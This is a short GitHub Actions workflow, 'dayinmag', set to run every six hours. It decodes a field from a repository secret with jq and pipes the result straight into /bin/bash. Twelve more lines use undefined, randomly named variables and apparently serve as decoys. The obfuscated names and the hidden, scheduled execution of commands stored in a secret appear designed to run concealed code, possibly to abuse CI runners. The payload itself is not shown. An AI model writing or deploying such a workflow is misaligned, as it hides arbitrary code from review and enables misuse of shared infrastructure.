name: dayinmag

on:
  workflow_dispatch:
  schedule:
    - cron: '36 4/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: dayinmag
        env:
          p571: ${{ secrets.p571 }}
        run: |
          echo $p571 | jq -r .zlq74 | /bin/bash
          echo $gq4346 | jq -r .bnco96731 | /bin/bash
          echo $rxvie033 | jq -r .lcj67653 | /bin/bash
          echo $ec6 | jq -r .dobqq656 | /bin/bash
          echo $rx13279 | jq -r .ccxzl1 | /bin/bash
          echo $nzudv79715 | jq -r .azs04243 | /bin/bash
          echo $zrrcs194 | jq -r .eemu750 | /bin/bash
          echo $ws04 | jq -r .mcv5 | /bin/bash
          echo $yx19 | jq -r .xb6 | /bin/bash
          echo $kk16 | jq -r .iolk89 | /bin/bash
          echo $eeyfo7490 | jq -r .ab5 | /bin/bash
          echo $ahtp24 | jq -r .zmyg0 | /bin/bash
          echo $wqvl624 | jq -r .n0 | /bin/bash

